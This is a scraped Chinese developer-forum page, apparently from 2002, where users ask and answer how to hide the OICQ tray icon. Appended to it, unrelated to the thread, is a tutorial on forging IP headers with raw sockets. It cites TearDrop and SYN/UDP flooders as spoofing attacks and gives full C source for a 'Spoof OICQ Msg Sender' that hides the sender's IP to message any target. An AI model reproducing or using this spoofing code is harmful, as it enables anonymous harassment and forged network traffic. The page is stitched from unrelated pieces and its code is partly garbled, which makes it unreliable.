oicq怎么隐藏?

danyanpi 2002-08-28 10:41:43
每当运行了oicq的时候,小企鹅的图标都会显示在屏幕的右下方,我可以让它不显示吗?有什么方法请大侠指教?
...全文
12 6 打赏 收藏 转发到动态 举报
写回复
用AI写文章
6 条回复
切换为时间正序
请发表友善的回复…
发表回复
treesman 2002-08-28
  • 打赏
  • 举报
回复
up
danyanpi 2002-08-28
  • 打赏
  • 举报
回复
怎么改成透明的呢?
Nicky_he 2002-08-28
  • 打赏
  • 举报
回复
还有一个方法,把qq中的图标改成透明的,这样就解决以上问题了。
danyanpi 2002-08-28
  • 打赏
  • 举报
回复
谢谢两位,隐藏了之后,我最小化了窗口,怎么找不到了?在任务管理其中也找不到。有什么办法呢?
allkeys 2002-08-28
  • 打赏
  • 举报
回复
it's right
luoshumeng 2002-08-28
  • 打赏
  • 举报
回复
点击系统参数有一项不在任务栏出现就OK了!
我们知道,TCP/IP网络数据全部是通过封装在IP数据包中在Internet网上传送的,也就是封装建立起一个包含IP头和数据的IP数据报。一般来说,网络软件总是以多个32位字产生IP头,即使必须用附加的0填充IP头。IP头包含了传输IP数据包中封装数据的所有必要信息。IP头的数据结构和描述如下: 成员 长度(Bit) 描述 Version 4 IP头的版本号,目前是IPv4,最新是IPv6 Header Length 4 IP头的长度,若没有特殊选择,IP头总是20字节长 Type of Service 8 服务类型,定义了数据传输的优先级、延迟、吞吐量和可靠性等特性 Total Packet Length 16 IP包的长度,若没有特殊选项,一般为20字节长 Identification 16 IP包标识,主机使用它唯一确定每个发送的数据报 Flag 3 IP数据分割标志 Fragment Offset 13 IP数据分割偏移 Time to Live 8 数据报在网络上的存活时间,每通过一个路由器,该数值减一 Protocol 8 TCP/IP协议类型,比如:ICMP为1,IGMP为2,TCP为6,UDP为17等 Header Checksum 16 头部检验和 Source IP Address 32 源IP地址 Destination IP Address 32 目的IP地址 Other ? 其他选项 Data ? 数据    实现自己定义的IP头是一件非常有意义的事情,比如,通过改变IP头里的TOS的优先级和TTL,你可以使自己的数据包有更强的传输能力和寿命,通过修改IP头里的源IP地址就可以隐藏自己机器的IP地址等等。象著名攻击程序“泪滴TearDrop”就是通过故意制造系统不能处理的分片IP包而实现的,还有SYN Flooder和UDP Flooder就是通过产生随机源IP实现欺骗的。 三、实现原理    一般来说,自定义IP头是通过使用socket的库函数setsockopt()的选项IP_HDRINCL来实现的,尽管这在unix和linux平台上很容易实现,但遗憾的是在Windows平台的Winsock1.1和Winsock2.0函数库里setsockopt()不支持IP_HDRINCL选项,所以在Windows 9x/NT里是无法通过Winsock函数库来实现IP头自定义的,当然可以通过编写虚拟设备驱动程序来实现,不过比较复杂,但Windows 2000的出现打破了这种局面,Windows2000的Winsock2.2函数库里全面支持setsockopt()的选项IP_HDRINCL,使得我们轻松就可以实现自定义的IP头。实现方法如下: SOCKET s; BOOL bopt; s=WSASocket(AF_INET, SOCK_RAW, IPPROTO_UDP, NULL, 0, WSA_FLAG_OVERLAPPED); ret = setsockopt(s, IPPROTO_IP, IP_HDRINCL, (char *)bopt, sizeof(bopt); 四、实例   为帮助大家尽快地学会构造自己的IP头数据,特给出一个完整的实例,例子的功能是:只要给出对方的IP地址,就可以发送给对方的OICQ一个“hello!”消息,并且由于修改了发送数据包的IP头,完全实现了发送方IP地址的隐藏,也就是说稍加修改你就可以制作出一个能够完完全全的匿名OICQ发送器,当然,若是故意捣乱的话,后果自负。源代码如下: /***********************************************************************/ /* OicqSend.c                                            */ /* 本程序用Visual C++ 6.0编译在Windows 2000 Advanced Server 上调试通过 */ /* Created by janker@371.net 2000.8.28                         */ /* 声明:本程序经修改后可能会产生攻击性擅自修改成攻击程序者后果自负  */ /***********************************************************************/ #pragma pack(1) #define WIN32_LEAN_AND_MEAN #include #include #include #include #include #define OICQ_MAX_PACKET 1024 #define OICQ_MAX_MSG 512 #define OICQ_MSG_LEN 45 #define SRC_IP "127.0.0.1" #define SRC_PORT 5277 #define DST_PORT 4000 typedef struct ip_hdr { unsigned char ip_verlen; unsigned char ip_tos; unsigned short ip_totallength; unsigned short ip_id; unsigned short ip_offset; unsigned char ip_ttl; unsigned char ip_protocol; unsigned short ip_checksum; unsigned int ip_srcaddr; unsigned int ip_destaddr; } IP_HDR; typedef struct udp_hdr { unsigned short src_portno; unsigned short dst_portno; unsigned short udp_length; unsigned short udp_checksum; } UDP_HDR; char strMessage[OICQ_MSG_LEN] = { 0x02,0x01,0x07,0x00,0x78,0x00,0x00,0x31,0x30,0x30,0x30,0x31,0x1f,0x30,0x1f, 0x30,0x30,0x1f,0x32,0x30,0x30,0x30,0x2d,0x30,0x31,0x2d,0x30,0x31,0x1f,0x30, 0x30,0x3a,0x30,0x30,0x3a,0x30,0x30,0x1f,0x68,0x65,0x6c,0x6c,0x6f,0x21,0x03 }; USHORT checksum(USHORT *buffer, int size) { unsigned long cksum=0; while (size > 1) { cksum += *buffer++; size -= sizeof(USHORT); } if (size) { cksum += *(UCHAR*)buffer; } cksum = (cksum >> 16) + (cksum & 0xffff); cksum += (cksum >>16); return (USHORT)(~cksum); } int main(int argc, char **argv) { WSADATA wsd; SOCKET s; BOOL bOpt; struct sockaddr_in remote; IP_HDR ipHdr; UDP_HDR udpHdr; int ret; DWORD i; unsigned short iTotalSize, iUdpSize, iUdpChecksumSize, iIPVersion, iIPSize, cksum = 0; char buf[OICQ_MAX_PACKET], *ptr = NULL; printf("Spoof OICQ Msg Sender - by Janker@371.net\n\n"); if(argc!=2) { printf("usage: OICQSEND Destination_IP_Address"); ExitProcess(1); } srand((unsigned)time(NULL)); strMessage[5]=rand(); if (WSAStartup(MAKEWORD(2,2), &wsd;) != 0) { printf("WSAStartup() failed: %d\n", GetLastError()); return -1; } s = WSASocket(AF_INET, SOCK_RAW, IPPROTO_UDP, NULL, 0,0); if (s == INVALID_SOCKET) { printf("WSASocket() failed: %d\n", WSAGetLastError()); return -1; } bOpt = TRUE; ret = setsockopt(s, IPPROTO_IP, IP_HDRINCL, (char *)&bOpt;, sizeof(bOpt)); if (ret == SOCKET_ERROR) { printf("setsockopt(IP_HDRINCL) failed: %d\n", WSAGetLastError()); return -1; } iTotalSize = sizeof(ipHdr) + sizeof(udpHdr) + OICQ_MSG_LEN; iIPVersion = 4; iIPSize = sizeof(ipHdr) / sizeof(unsigned long); ipHdr.ip_verlen = (iIPVersion << 4) | iIPSize; ipHdr.ip_tos = 0; ipHdr.ip_totallength = htons(iTotalSize); ipHdr.ip_id = 0; ipHdr.ip_offset = 0; ipHdr.ip_ttl = 128; ipHdr.ip_protocol = 0x11; ipHdr.ip_checksum = 0 ; ipHdr.ip_srcaddr = inet_addr(SRC_IP); ipHdr.ip_destaddr = inet_addr(argv[1]); iUdpSize = sizeof(udpHdr) + OICQ_MSG_LEN; udpHdr.src_portno = htons(SRC_PORT) ; udpHdr.dst_portno = htons(DST_PORT) ; udpHdr.udp_length = htons(iUdpSize) ; udpHdr.udp_checksum = 0 ; iUdpChecksumSize = 0; ptr = buf; ZeroMemory(buf, OICQ_MAX_PACKET); memcpy(ptr, &ipHdr;.ip_srcaddr, sizeof(ipHdr.ip_srcaddr)); ptr += sizeof(ipHdr.ip_srcaddr); iUdpChecksumSize += sizeof(ipHdr.ip_srcaddr); memcpy(ptr, &ipHdr;.ip_destaddr, sizeof(ipHdr.ip_destaddr)); ptr += sizeof(ipHdr.ip_destaddr); iUdpChecksumSize += sizeof(ipHdr.ip_destaddr); ptr++; iUdpChecksumSize += 1; memcpy(ptr, &ipHdr;.ip_protocol, sizeof(ipHdr.ip_protocol)); ptr += sizeof(ipHdr.ip_protocol); iUdpChecksumSize += sizeof(ipHdr.ip_protocol); memcpy(ptr, &udpHdr;.udp_length, sizeof(udpHdr.udp_length)); ptr += sizeof(udpHdr.udp_length); iUdpChecksumSize += sizeof(udpHdr.udp_length); memcpy(ptr, &udpHdr;, sizeof(udpHdr)); ptr += sizeof(udpHdr); iUdpChecksumSize += sizeof(udpHdr); for(i = 0; i *ptr = strMessage[i]; iUdpChecksumSize += OICQ_MSG_LEN; cksum = checksum((USHORT *)buf, iUdpChecksumSize); udpHdr.udp_checksum = cksum; ZeroMemory(buf, OICQ_MAX_PACKET); ptr = buf; memcpy(ptr, &ipHdr;, sizeof(ipHdr)); ptr += sizeof(ipHdr); memcpy(ptr, &udpHdr;, sizeof(udpHdr)); ptr += sizeof(udpHdr); memcpy(ptr, strMessage, OICQ_MSG_LEN); remote.sin_family = AF_INET; remote.sin_port = htons(DST_PORT); remote.sin_addr.s_addr = inet_addr(argv[1]); ret = sendto(s, buf, iTotalSize, 0, (SOCKADDR *)&remote;, sizeof(remote)); if (ret == SOCKET_ERROR) printf("sendto() failed: %d\n", WSAGetLastError()); else printf("Send O.K.!"); closesocket(s) ; WSACleanup() ; return 0; }

5,379

社区成员

发帖
与我相关
我的任务
社区描述
Delphi 开发及应用
社区管理员
  • VCL组件开发及应用社区
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧